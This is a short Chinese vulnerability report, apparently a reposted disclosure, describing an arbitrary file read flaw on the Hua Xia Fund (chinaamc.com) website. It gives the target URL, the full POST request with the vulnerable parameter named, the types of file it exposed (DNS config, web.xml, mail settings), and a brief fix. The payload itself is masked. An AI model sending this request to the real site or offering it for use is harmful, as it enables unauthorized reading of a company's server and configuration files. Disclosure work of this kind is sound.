首页 » 漏洞 » 华夏基金主站任意文件读取漏洞

华夏基金主站任意文件读取漏洞

 
文章目录

URL:http://www.chinaamc.com:80/portal/en/second.jsp POST参数:button=Get%20NAVs&categoty_link_nav=xxxxxxxx&column=ROOT>en>Investment%20Products>ABF%20China%20Bond%20Index%20Fund>Fund%20Unit%20NAV%20(Class%20A)&columnId=1302845853100&flg=1&fromDate=01/01/1967&link_page=/portal/en/second.jsp&minisite_column=ROOT>en>Investment%20Products>ABF%20China%20Bond%20Index%20Fund>Fund%20Unit%20NAV%20(Class%20A)&minisite_columnId=1147311052100&styleFlag=chanpin1a&submited=Y&time=1&toDate=01/01/1967存在问题参数categoty_link_navDNS配置信息
华夏基金主站任意文件读取漏洞
web.xml信息
华夏基金主站任意文件读取漏洞
mail信息
华夏基金主站任意文件读取漏洞
后续可能需要借助字典来跑文件了

解决方案:

过滤特殊字符

原文链接:华夏基金主站任意文件读取漏洞,转载请注明来源!

0